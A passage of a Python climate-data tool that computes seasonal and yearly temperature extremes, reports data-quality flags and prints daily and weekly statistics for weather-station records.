["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y][s]["tmaxPROP"]["day_max"][0]) metclmt[y]["tmaxPROP"]["day_min"][0] = min(metclmt[y]["tmax"]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tmaxPROP"]["day_min"][0] = min(metclmt[y][s]["tmax"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tmaxPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in ["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y]["tmaxPROP"]["day_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in ["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y][s]["tmaxPROP"]["day_min"][0]) if any(len(metclmt[y][M]["tmax"]) > excludemonth for M in metclmt[y] if type(M) == int): metclmt[y]["tmaxPROP"]["month_AVG_max"][0] = round(max(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmax"]) > excludemonth),1) metclmt[y]["tmaxPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y]["tmaxPROP"]["month_AVG_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y][s]["tmaxPROP"]["month_AVG_max"][0]) metclmt[y]["tmaxPROP"]["month_AVG_min"][0] = round(min(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmax"]) > excludemonth),1) metclmt[y]["tmaxPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y]["tmaxPROP"]["month_AVG_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y][s]["tmaxPROP"]["month_AVG_min"][0]) for s in ["spring","summer","fall","winter"]: try:metclmt[y][s]["tmaxPROP"]["month_AVG_max"][0] = round(max(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tmaxPROP"]["month_AVG_min"][0] = round(min(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) # TMIN metclmt[y]["tmin"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmin"] = [] metclmt[y]["tmin"].extend(tx for m in metclmt[y].keys() if type(m) == int for tx in metclmt[y][m]["tmin"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmin"].extend(tx for m in metclmt[y].keys() if type(m) == int and m in metclmt[y][s]["valid"] for tx in metclmt[y][m]["tmin"]) metclmt[y]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if len(metclmt[y]["tmin"]) > 0: metclmt[y]["tminPROP"]["day_max"][0] = max(metclmt[y]["tmin"]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tminPROP"]["day_max"][0] = max(metclmt[y][s]["tmin"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tminPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y]["tminPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y][s]["tminPROP"]["day_max"][0]) metclmt[y]["tminPROP"]["day_min"][0] = min(metclmt[y]["tmin"]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tminPROP"]["day_min"][0] = min(metclmt[y][s]["tmin"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tminPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y]["tminPROP"]["day_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y][s]["tminPROP"]["day_min"][0]) if any(len(metclmt[y][M]["tmin"]) > excludemonth for M in metclmt[y] if type(M) == int): metclmt[y]["tminPROP"]["month_AVG_max"][0] = round(max(mean(metclmt[y][m]["tmin"]) for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth),1) metclmt[y]["tminPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth and round(mean(metclmt[y][m]["tmin"]),1) == metclmt[y]["tminPROP"]["month_AVG_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmin"]) > excludemonth and round(mean(metclmt[y][m]["tmin"]),1) == metclmt[y][s]["tminPROP"]["month_AVG_max"][0]) metclmt[y]["tminPROP"]["month_AVG_min"][0] = round(min(mean(metclmt[y][m]["tmin"]) for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth),1) metclmt[y]["tminPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth and round(mean(metclmt[y][m]["tmin"]),1) == metclmt[y]["tminPROP"]["month_AVG_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmin"]) > excludemonth and round(mean(metclmt[y][m]["tmin"]),1) == metclmt[y][s]["tminPROP"]["month_AVG_min"][0]) for s in ["spring","summer","fall","winter"]: try:metclmt[y][s]["tminPROP"]["month_AVG_max"][0] = round(max(mean(metclmt[y][m]["tmin"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmin"]) > excludemonth),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tminPROP"]["month_AVG_min"][0] = round(min(mean(metclmt[y][m]["tmin"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmin"]) > excludemonth),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) END = time() if len(station_ids) > 1: print("STATION: Multiple Stations") clmt["station"] = "{} Stations".format(len(station_ids)) else: print("STATION: {}".format(clmt["station"])) print("*** SCRIPT COMPLETE ***") print("Runtime: {} seconds".format(round(END - START,2))) print("-------------------------------------------------------------------------------------") print(" For more detailed assistance, enter clmthelp() for a breakdown of available functions") print("-------------------------------------------------------------------------------------") def attchk(attstr): """Not used by user; program uses it for output and 'filling in' of missing data""" try: M = attstr[0] # Measurement Flag except: M = "" try: Q = attstr[1] # Quality Flag except: Q = "" try: S = attstr[2] # Source Flag except: S = "" try: T = attstr[3] # Time of Observation except: T = "" return M,Q,S,T def errorStats(): """Returns a report on errors that might be worth veryfying the data for. errorStats() -> report on possible-to-likely errors in the record; no arguments passeds """ #if "ignore" in ig: ignoreflags.append(ig["ignore"]) #if "heed" in ig: ignoreflags.remove(ig["heed"]) if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") total_records = 0 errors = [] nonIerrors = [] prcp_errors = [] snow_errors = [] snwd_errors = [] tmax_errors = [] tmin_errors = [] error_array = [prcp_errors,snow_errors,snwd_errors,tmax_errors,tmin_errors] misscounter = 0 tmax_lt_tmin = [] snow_gt_0prcp = [] snwd_gt_snow = [] for y in [year for year in clmt if type(year) == int]: for m in [month for month in clmt[y] if type(month) == int]: for d in [day for day in clmt[y][m] if type(day) == int]: total_records += 1 if any(e != "" for e in [clmt[y][m][d].prcpQ,clmt[y][m][d].snowQ,clmt[y][m][d].snwdQ,clmt[y][m][d].tmaxQ,clmt[y][m][d].tminQ]): errors.append(clmt[y][m][d]) if clmt[y][m][d].prcpQ != "": prcp_errors.append(clmt[y][m][d]) if clmt[y][m][d].snowQ != "": snow_errors.append(clmt[y][m][d]) if clmt[y][m][d].snwdQ != "": snwd_errors.append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ != "": tmax_errors.append(clmt[y][m][d]) if clmt[y][m][d].tminQ != "": tmin_errors.append(clmt[y][m][d]) try: if int(clmt[y][m][d].tmax) < int(clmt[y][m][d].tmin): tmax_lt_tmin.append("Day: {}; TMAX: {}; TMIN: {}".format(clmt[y][m][d].daystr,clmt[y][m][d].tmax,clmt[y][m][d].tmin)) except: misscounter += 1 try: if float(clmt[y][m][d].snow) > 0 and float(clmt[y][m][d].prcp) == 0 and clmt[y][m][d].prcpM != "T": snow_gt_0prcp.append("Day: {}; PRCP: {} - {} :: SNOW: {} - {}".format(clmt[y][m][d].daystr,clmt[y][m][d].prcp,clmt[y][m][d].prcpQ if clmt[y][m][d].prcpQ != "" else " ",clmt[y][m][d].snow,clmt[y][m][d].snowQ if clmt[y][m][d].snowQ != "" else " ")) except: continue print("Total Dates with at least 1 Quality Flag: {}; % of Total Days: {}%".format(len(errors),round(len(errors)/total_records*100,2))) for x in range(len(error_array)): if x == 0: print("PRCP ERRORS:") if x == 1: print("SNOW ERRORS:") if x == 2: print("SNWD ERRORS:") if x == 3: print("TMAX ERRORS (Non-I):") if x == 4: print("TMIN ERRORS (Non-I):") for y in error_array[x]: if x == 0: if y.prcpQ not in [i for i in ignoreflags if i != "I"] or y.prcp in ["9999","-9999"]: print("Day: {}; PRCP: {}; Quality Flag (prcpQ): {} - {}".format(y.daystr,y.prcp,y.prcpQ,qflagCheck(y.prcpQ))) if x == 1: if y.snowQ not in [i for i in ignoreflags if i != "I"] or y.snow in ["9999","-9999"]: print("Day: {}; SNOW: {}; Quality Flag (snowQ): {} - {}".format(y.daystr,y.snow,y.snowQ,qflagCheck(y.snowQ))) if x == 2: if y.snwdQ not in ignoreflags or y.snwd in ["9999","-9999"]: print("Day: {}; SNWD: {}; Quality Flag (snwdQ): {} - {}".format(y.daystr,y.snwd,y.snwdQ,qflagCheck(y.snwdQ))) if x == 3: if y.tmaxQ not in ignoreflags and y.tmaxQ != "I" or y.tmax in ["9999","-9999"]: print("Day: {}; TMAX: {}; Quality Flag (tmaxQ): {} - {}".format(y.daystr,y.tmax,y.tmaxQ,qflagCheck(y.tmaxQ))) if x == 4: if y.tminQ not in ignoreflags and y.tminQ != "I" or y.tmax in ["9999","-9999"]: print("Day: {}; TMIN: {}; Quality Flag (tminQ): {} - {}".format(y.daystr,y.tmin,y.tminQ,qflagCheck(y.tminQ))) print("---------------------------") print("TOTAL DAYS where tmax and/or tmin is missing: {}".format(misscounter)) if len(tmax_lt_tmin) > 0: print("DAYS WHERE TMIN > TMAX:") for x in tmax_lt_tmin: print(x) if len(snow_gt_0prcp) > 0: print("----------------------------") print("DAYS WHERE PRCP == 0 (with no trace recorded) and SNOW > 0:") for x in snow_gt_0prcp: print(x) print("") def checkDate(*args): """Used only by the program""" if len(args) == 3: y = args[0] m = args[1] d = args[2] try: if clmt[y][m][d]: return True except KeyError: print("OOPS! An entry for {}-{}-{} was not found. Try again.".format(str(y).zfill(4),str(m).zfill(2)[0:2],str(d).zfill(2)[0:2])) if d > y or m > y: print("*** Ensure your entry matches the format of dayStats(year,month,day) ***") return False elif len(args) == 2: y = args[0] m = args[1] try: if clmt[y][m]: return True except KeyError: try: print("OOPS! An entry for {} {} was not found. Try again.".format(calendar.month_name[m],y)) if m > y: print("*** Ensure your entry matches the format of monthStats(year,month) ***") except: print("OOPS! A likely invalid month entry. Ensure format of monthStats(year,month). Try again.") return False elif len(args) == 1: y = args[0] try: if clmt[y]: return True except KeyError: print("OOPS! An entry for {} was not found. Try again.".format(y)) return False else: print("OOPS! No date input received! Try again!") def checkDate2(*args): """Used only by the program in functions that check but don't return a true/false message""" y = args[0] m = args[1] d = args[2] try: if clmt[y][m][d]: return True except KeyError: return False def rank(n): if n <= 0 or type(n) != int: return "" elif n < 10 or int(str(n)[-2:]) not in [11,12,13]: if int(str(n)[-1:]) == 1: return str(n) + "st" elif int(str(n)[-1:]) == 2: return str(n) + "nd" elif int(str(n)[-1:]) == 3: return str(n) + "rd" else: return str(n) + "th" elif int(str(n)[-2:]) in [11,12,13]: return str(n) + "th" def qflagCheck(*q): """Primarily used internally by the program. Can return definitions of Quality Flags. These are used to denote data that may not be reliable. qflagCheck(*[str]) -> str OPTIONAL args: "F" -> will return the definition of a flag by that one- letter string """ if len(q) != 0: if q[0] == "D": return "Failed (D)uplicate Check" if q[0] == "G": return "Failed (G)ap Check" if q[0] == "I": return "Failed (I)nternal Consistency Check" if q[0] == "K": return "Failed Strea(K)/Frequent-Value Check" if q[0] == "L": return "Failed Check on (L)ength of Multi-day period" if q[0] == "M": return "Failed (M)ega-Consistency Check" if q[0] == "N": return "Failed (N)aught Check" if q[0] == "O": return "Failed Climatological (O)utlier Check" if q[0] == "R": return "Failed Lagged (R)ange Check" if q[0] == "S": return "Failed (S)patial Consistency Check" if q[0] == "T": return "Failed (T)emporal Consistency Check" if q[0] == "W": return "Temperature Too (W)arm for Snow" if q[0] == "X": return "Failed Bounds Check" if q[0] == "Z": return "Flagged as a result of an official Datzilla Investigation" else: return "None/Not-Documented" else: print("D - Failed (D)uplicate Check") print("G - Failed (G)ap Check") print("I - Failed (I)nternal Consistency Check") print("K - Failed Strea(K)/Frequent-Value Check") print("L - Failed Check on (L)ength of Multi-day period") print("M - Failed (M)ega-Consistency Check") print("N - Failed (N)aught Check") print("O - Failed Climatological (O)utlier Check") print("R - Failed Lagged (R)ange Check") print("S - Failed (S)patial Consistency Check") print("T - Failed (T)emporal Consistency Check") print("W - Temperature Too (W)arm for Snow") print("X - Failed Bounds Check") print("Z - Flagged as a result of an official Datzilla Investigation") def daySummary(y1,m1,d1,*date2): """Quickly list all specific daily data between two dates. The 2nd date is optional. If none is provided, December 31 of y1 will be used as the stop date. daySummary(y1,m1,d1,*[y2,m2,d2]) EXAMPLE: daySummary(2016,10,1,2016,10,31) -> Lists daily summaries for dates between 1 OCT 2016 and 31 OCT 2016 EXAMPLE: daySummary(1980,11,1) -> Lists daily summaries for dates between 1 NOV 1980 and 31 DEC 1980 """ if any(type(x) != int for x in [y1,m1,d1]): return print("*** OOPS! Error in Date #1. Ensure that only integers are entered ***") #valid1 = checkDate(y1,m1,d1) if len(date2) == 0: if y1 == max(Y for Y in clmt if type(Y) == int): y2 = y1 m2 = max(M for M in clmt[y2] if type(M) == int) d2 = max(D for D in clmt[y2][m2] if type(D) == int) else: y2 = y1; m2 = 12; d2 = 31 elif len(date2) != 3: return print("*** OOPS! For the 2nd (optional) date, ensure a Year, Month and Date are entered ***") else: if any(type(x) != int for x in [date2[0],date2[1],date2[2]]): return print("*** OOPS! Error in Date #2. Ensure that only integers are entered ***") #valid2 = checkDate(date2[0],date2[1],date2[2]) y2 = date2[0]; m2 = date2[1]; d2 = date2[2] # Further inspection of Day 1 if y1 not in clmt: return print("OOPS! Regarding Date #1, no yearly-data found for {}. The earliest year is {}.".format(y1,min(Y for Y in clmt if type(Y) == int))) if m1 not in range(1,12+1): return print("OOPS! Regarding Date #1, ensure the month is in the range [1,12]. Try again!") daysinmonth = max(D for Y in clmt if type(Y) == int and m1 in clmt[Y] for D in clmt[Y][m1] if type(D) == int) if d1 not in range(1,daysinmonth+1): return print("OOPS! Regarding Date #1, ensure the day is in the range [1,{}]. Try again!".format(daysinmonth)) if m1 == 2 and d1 == 29 and calendar.isleap(y1) == False: print("OOPS! Date #1 does not occur. It's not during a leap year. Try again!") # Furthur inspection of Day 2 if y2 not in clmt: return print("OOPS! Regarding Date #2, no yearly-data found for {}. The earliest year is {}.".format(y2,min(Y for Y in clmt if type(Y) == int))) if m2 not in range(1,12+1): return print("OOPS! Regarding Date #2, ensure the month is in the range [1,12]. Try again!") daysinmonth = max(D for Y in clmt if type(Y) == int and m2 in clmt[Y] for D in clmt[Y][m2] if type(D) == int) if d2 not in range(1,daysinmonth+1): return print("OOPS! Regarding Date #2, ensure the day is in the range [1,{}]. Try again!".format(daysinmonth)) if m2 == 2 and d2 == 29 and calendar.isleap(y2) == False: print("OOPS! Date #2 does not occur. It's not during a leap year. Try again!") startday = datetime.date(y1,m1,d1) endday = datetime.date(y2,m2,d2) if startday == endday: return print("OOPS! Start and End dates are the exact same; please ensure otherwise! Try again!") if endday < startday: return print("OOPS! End date is sooner than the start date. Try again!") incrday = startday print("") print("{:^88}".format("Day Summaries from {} {} {} to {} {} {}".format(str(d1).zfill(2),calendar.month_abbr[m1].upper(),y1,str(d2).zfill(2),calendar.month_abbr[m2].upper(),y2))) print("{:^88}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^88}".format("{:-^45}".format(""))) while incrday <= endday: # { try: print(" {}: PRCP: {:>5}{:3}; SNOW: {:>4}{:3}; SNWD: {:>4}{:3}; TMAX: {:>3}{:3}; TMIN: {:>3}{:3};".format( clmt[incrday.year][incrday.month][incrday.day].daystr, "{:>5.2f}".format(float(clmt[incrday.year][incrday.month][incrday.day].prcp)) if clmt[incrday.year][incrday.month][incrday.day].prcp != "" else "", "{} {}".format( clmt[incrday.year][incrday.month][incrday.day].prcpM if clmt[incrday.year][incrday.month][incrday.day].prcpM == "T" else "", clmt[incrday.year][incrday.month][incrday.day].prcpQ if clmt[incrday.year][incrday.month][incrday.day].prcpQ != "" else ""), "{:>4.1f}".format(float(clmt[incrday.year][incrday.month][incrday.day].snow)) if (clmt[incrday.year][incrday.month][incrday.day].snow != "" and float(clmt[incrday.year][incrday.month][incrday.day].snow) != 0) or (clmt[incrday.year][incrday.month][incrday.day].snow != "" and clmt[incrday.year][incrday.month][incrday.day].snowM == "T") else "----", "{} {} ".format( clmt[incrday.year][incrday.month][incrday.day].snowM if clmt[incrday.year][incrday.month][incrday.day].snowM == "T" else "", clmt[incrday.year][incrday.month][incrday.day].snowQ if clmt[incrday.year][incrday.month][incrday.day].snowQ != "" else ""), "{:>4.1f}".format(float(clmt[incrday.year][incrday.month][incrday.day].snwd)) if (clmt[incrday.year][incrday.month][incrday.day].snwd != "" and float(clmt[incrday.year][incrday.month][incrday.day].snwd) != 0) or (clmt[incrday.year][incrday.month][incrday.day].snwd != "" and clmt[incrday.year][incrday.month][incrday.day].snwdM == "T") else "----", "{} {} ".format( clmt[incrday.year][incrday.month][incrday.day].snwdM if clmt[incrday.year][incrday.month][incrday.day].snwdM == "T" else "", clmt[incrday.year][incrday.month][incrday.day].snwdQ if clmt[incrday.year][incrday.month][incrday.day].snwdQ != "" else ""), clmt[incrday.year][incrday.month][incrday.day].tmax, " {} ".format(clmt[incrday.year][incrday.month][incrday.day].tmaxQ) if clmt[incrday.year][incrday.month][incrday.day].tmaxQ != "" else "", clmt[incrday.year][incrday.month][incrday.day].tmin, " {} ".format(clmt[incrday.year][incrday.month][incrday.day].tminQ) if clmt[incrday.year][incrday.month][incrday.day].tminQ != "" else "" )) except: print(" *** NO ENTRY DATA FOUND FOR {}-{}-{} ***".format(incrday.year,incrday.month,incrday.day)) incrday += datetime.timedelta(days=1) print("") def dayStats(y,m,d): """Report on recorded statistics for the day of interest. Passed arguments MUST be integers. dayStats(year,month,day) EXAMPLE: dayStats(1992,12,29) -> Returns a printout of statistics from December 29, 1992 """ ranks = ["th","st","nd","rd","th","th","th","th","th","th"] if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") dayExists = checkDate(y,m,d) if dayExists: print("") dayobj = clmt[y][m][d] prcphist = sorted(list(set(list(round(float(clmt[Y][m][d].prcp),2) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].prcp != "" and float(clmt[Y][m][d].prcp) != 0 and clmt[Y][m][d].prcpQ in ignoreflags))),reverse=True) snowhist = sorted(list(set(list(round(float(clmt[Y][m][d].snow),1) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].snow != "" and float(clmt[Y][m][d].snow) != 0 and clmt[Y][m][d].snowQ in ignoreflags))),reverse=True) snwdhist = sorted(list(set(list(round(float(clmt[Y][m][d].snwd),1) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].snwd != "" and float(clmt[Y][m][d].snwd) != 0 and clmt[Y][m][d].snwdQ in ignoreflags))),reverse=True) tmaxdeschist = sorted(list(set(list(int(clmt[Y][m][d].tmax) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmax != "" and clmt[Y][m][d].tmaxQ == ""))),reverse=True) tmaxaschist = sorted(list(set(list(int(clmt[Y][m][d].tmax) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmax != "" and clmt[Y][m][d].tmaxQ == "")))) tmindeschist = sorted(list(set(list(int(clmt[Y][m][d].tmin) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmin != "" and clmt[Y][m][d].tminQ == ""))),reverse=True) tminaschist = sorted(list(set(list(int(clmt[Y][m][d].tmin) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmin != "" and clmt[Y][m][d].tminQ == "")))) #clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}} tavgdeschist = sorted(list(set(list(V for V in clmt_vars_days["tavg"] for D in clmt_vars_days["tavg"][V] if D.month == m and D.day == d))),reverse=True) tavgaschist = sorted(list(set(list(V for V in clmt_vars_days["tavg"] for D in clmt_vars_days["tavg"][V] if D.month == m and D.day == d)))) #sorted(list(set(list(round(float(clmt[Y][m][d].prcp),2) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].prcp != "" and float(clmt[Y][m][d].prcp) != 0 and clmt[Y][m][d].prcpQ == ""))),reverse=True) print("Statistics for {}".format(dayobj.entryday)) print("Report Location: {}, {}".format(dayobj.stationid,dayobj.station_name)) print("-------------------") print("PRCP: {}{}{}".format("T" if dayobj.prcpM == "T" else dayobj.prcp, ", Flag: {} - {}".format(dayobj.prcpQ,qflagCheck(dayobj.prcpQ)) if dayobj.prcpQ != "" else "", # rank(tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1))+1) ", Rank: {}".format(rank(prcphist.index(round(float(dayobj.prcp),2))+1)) if dayobj.prcp != "" and float(dayobj.prcp) != 0 else "")) if dayobj.snow != "" and float(dayobj.snow) > 0 or dayobj.snowM == "T": print("SNOW: {}{}{}".format("T" if dayobj.snowM == "T" else dayobj.snow, ", Flag: {} - {}".format(dayobj.snowQ,qflagCheck(dayobj.snowQ)) if dayobj.snowQ != "" else "", ", Rank: {}".format(rank(snowhist.index(round(float(dayobj.snow),1))+1)) if dayobj.snowQ in ignoreflags else "")) if dayobj.snwd != "" and float(dayobj.snwd) > 0: print("SNWD: {}{}{}".format("T" if dayobj.snwdM == "T" else dayobj.snwd, ", Flag: {} - {}".format(dayobj.snwdQ,qflagCheck(dayobj.snwdQ)) if dayobj.snwdQ != "" else "", ", Rank: {}".format(rank(snwdhist.index(round(float(dayobj.snwd),1))+1)) if dayobj.snwdQ in ignoreflags else "")) print("TAVG: {}{}{}".format( "{:4.1f}".format(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) if all(T != "" for T in [dayobj.tmax,dayobj.tmin]) and all(Q in ignoreflags for Q in [dayobj.tmaxQ,dayobj.tminQ]) else "N/A", ", Rank: {} Warmest".format( rank(tavgdeschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1))+1)) if all(T != "" for T in [dayobj.tmax,dayobj.tmin]) and all(Q in ignoreflags for Q in [dayobj.tmaxQ,dayobj.tminQ]) and tavgdeschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) <= tavgaschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) else "", ", Rank: {} Coolest".format( rank(tavgaschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1))+1)) if all(T != "" for T in [dayobj.tmax,dayobj.tmin]) and all(Q in ignoreflags for Q in [dayobj.tmaxQ,dayobj.tminQ]) and tavgaschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) <= tavgdeschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) else "" )) print("TMAX: {}{}{}{}".format( dayobj.tmax if dayobj.tmax != "" else "N/A", ", Flag: {} - {}".format(dayobj.tmaxQ,qflagCheck(dayobj.tmaxQ)) if dayobj.tmaxQ != "" else "", ", Rank: {} Warmest".format(rank(tmaxdeschist.index(int(dayobj.tmax))+1)) if dayobj.tmax != "" and dayobj.tmaxQ in ignoreflags and tmaxdeschist.index(int(dayobj.tmax)) <= tmaxaschist.index(int(dayobj.tmax)) else "", ", Rank: {} Coolest".format(rank(tmaxaschist.index(int(dayobj.tmax))+1)) if dayobj.tmax != "" and dayobj.tmaxQ in ignoreflags and tmaxaschist.index(int(dayobj.tmax)) <= tmaxdeschist.index(int(dayobj.tmax)) else "" )) print("TMIN: {}{}{}{}".format( dayobj.tmin if dayobj.tmin != "" else "N/A", ", Flag: {} - {}".format(dayobj.tminQ,qflagCheck(dayobj.tminQ)) if dayobj.tminQ != "" else "", ", Rank: {} Warmest".format(rank(tmindeschist.index(int(dayobj.tmin))+1)) if dayobj.tmin != "" and dayobj.tminQ in ignoreflags and tmindeschist.index(int(dayobj.tmin)) <= tminaschist.index(int(dayobj.tmin)) else "", ", Rank: {} Coolest".format(rank(tminaschist.index(int(dayobj.tmin))+1)) if dayobj.tmin != "" and dayobj.tminQ in ignoreflags and tminaschist.index(int(dayobj.tmin)) <= tmindeschist.index(int(dayobj.tmin)) else "" )) try: if int(dayobj.tmax) < int(dayobj.tmin): print("*** CHECK DATA: TMIN > TMAX ***") except: pass print("") def weekStats(y,m,d): """Report on recorded statistics for a week of interest. The week will be centered on the day passed as an argument. Passed arguments MUST be integers. weekStats(year,month,day) EXAMPLE: weekStats(1992,12,29) -> Returns a printout of weekly-based statistics centered on December 29, 1992 (The week would be inclusive 3 days before and after the date """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") ranks = ["th","st","nd","rd","th","th","th","th","th","th"] if m == 2 and d == 29: m = 2; d = 28 wkstart = datetime.date(y,m,d) - datetime.timedelta(days=3) c = wkstart wkend = datetime.date(y,m,d) + datetime.timedelta(days=3) #print(st) #print(datetime.date(y,m,d)) #print(en) w_prcp = [] w_prcpDAYS = 0 w_snow = [] w_snowDAYS = 0 w_snwd = [] w_tmax = [] w_tmin = [] w_alltemps = [] records_in_week = 0 weekExists = checkDate(y,m,d) indvweekdays = [] if m == 2 and d == 29: m = 2; d = 28 if weekExists: print("") for x in range(7): indvweekdays.append(c) try: #round(float(clmt[DY.year][DY.month][DY.day].prcp),2) for DY in indvweekdays if checkDate(DY.year,DY.month,DY.day) and clmt[DY.year][DY.month][DY.day].prcp != "" and clmt[DY.year][DY.month][DY.day].prcpQ in ignoreflags if clmt[c.year][c.month][c.day]: records_in_week += 1 if clmt[c.year][c.month][c.day].prcpQ in ignoreflags and clmt[c.year][c.month][c.day].prcp not in ["9999","-9999",""]: w_prcp.append(round(float(clmt[c.year][c.month][c.day].prcp),2)) if float(clmt[c.year][c.month][c.day].prcp) > 0 or 